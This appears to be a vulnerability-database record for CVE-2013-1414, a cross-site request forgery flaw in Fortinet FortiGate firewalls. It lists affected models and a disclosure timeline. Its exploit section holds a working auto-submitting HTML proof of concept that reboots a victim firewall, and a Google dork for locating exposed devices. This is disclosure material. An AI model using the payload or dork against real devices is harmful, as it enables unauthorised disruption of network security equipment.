ID

VAR-E-201306-0228


CVE

cve_id:CVE-2013-1414

Trust: 2.4

sources: BID: 60861 // PACKETSTORM: 122216 // EXPLOIT-DB: 26528 // EDBNET: 48498

EDB ID

26528


TITLE

Fortigate Firewalls - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 26528

DESCRIPTION

Fortigate Firewalls - Cross-Site Request Forgery. CVE-2013-1414CVE-94724 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 26528

AFFECTED PRODUCTS

vendor:fortigatemodel:firewallsscope: - version: -

Trust: 1.6

vendor:fortigatemodel:firewallscope: - version: -

Trust: 0.5

vendor:fortinetmodel:fortiosscope:eqversion:5.0.2

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:5.0.1

Trust: 0.3

vendor:fortinetmodel:fortios b0630scope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortios b0537scope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:4.3.8

Trust: 0.3

vendor:fortinetmodel:fortios b064scope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortiosscope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortigate-60cscope:eqversion:4.0

Trust: 0.3

vendor:fortinetmodel:fortigate-100dscope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortigate-1000scope:eqversion:3.00

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4.3.6

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4.3.5

Trust: 0.3

vendor:fortinetmodel:fortigate 800fscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:800

Trust: 0.3

vendor:fortinetmodel:fortigate 620bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 60mscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:60

Trust: 0.3

vendor:fortinetmodel:fortigate 50amscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 50ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 500ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:5000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:500

Trust: 0.3

vendor:fortinetmodel:fortigate 400ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:4000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:400

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3950

Trust: 0.3

vendor:fortinetmodel:fortigate 3810ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 3600ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3600

Trust: 0.3

vendor:fortinetmodel:fortigate 311bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 310bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 3016bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 300ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:300

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:3.00

Trust: 0.3

vendor:fortinetmodel:fortigate 224bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 200bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 200ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:200

Trust: 0.3

vendor:fortinetmodel:fortigate 1240bscope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 100ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 1000afa2scope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigate 1000ascope: - version: -

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:1000

Trust: 0.3

vendor:fortinetmodel:fortigatescope:eqversion:100

Trust: 0.3

vendor:fortinetmodel:fortiosscope:neversion:5.0.3

Trust: 0.3

vendor:fortinetmodel:fortiosscope:neversion:4.3.13

Trust: 0.3

sources: BID: 60861 // PACKETSTORM: 122216 // EXPLOIT-DB: 26528 // EDBNET: 48498

EXPLOIT

Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 & < 5.0.2

Description
==========
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.

Requirements
===========
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.


Report-Timeline:
================
Vendor Notification: 11 July 2012
Vendor released version 5.0.2 / 18 March 2013
Vendor released version 4.3.13 / 29 April 2013
Status: Fixed

Google Dork:
==========
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"


Credit:
=====
Sven Wurth dos@net-war.de


PoC
====

This Example will reboot a Fortinet Firewall.
This is just one of many possibilities to attack this vulnerability.

##### CSRF - Proof Of Concept ####
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
<input type="hidden" name="reason" value="">
<input type="hidden" name="action" value="1">
<input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
##### End Poc #####

Trust: 1.0

sources: EXPLOIT-DB: 26528

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 26528

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 26528

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 26528

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 122216

CREDITS

Sven Wurth

Trust: 0.6

sources: EXPLOIT-DB: 26528

EXTERNAL IDS

db:NVDid:CVE-2013-1414

Trust: 2.4

db:EXPLOIT-DBid:26528

Trust: 1.6

db:EDBNETid:48498

Trust: 0.6

db:PACKETSTORMid:122216

Trust: 0.5

db:BIDid:60861

Trust: 0.3

sources: BID: 60861 // PACKETSTORM: 122216 // EXPLOIT-DB: 26528 // EDBNET: 48498

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-1414

Trust: 2.1

url:https://www.exploit-db.com/exploits/26528/

Trust: 0.6

url:https://www.fortinet.com/

Trust: 0.3

sources: BID: 60861 // PACKETSTORM: 122216 // EXPLOIT-DB: 26528 // EDBNET: 48498

SOURCES

db:BIDid:60861
db:PACKETSTORMid:122216
db:EXPLOIT-DBid:26528
db:EDBNETid:48498

LAST UPDATE DATE

2022-07-27T09:45:14.670000+00:00


SOURCES UPDATE DATE

db:BIDid:60861date:2013-06-28T00:00:00

SOURCES RELEASE DATE

db:BIDid:60861date:2013-06-28T00:00:00
db:PACKETSTORMid:122216date:2013-06-28T22:13:39
db:EXPLOIT-DBid:26528date:2013-07-01T00:00:00
db:EDBNETid:48498date:2013-07-01T00:00:00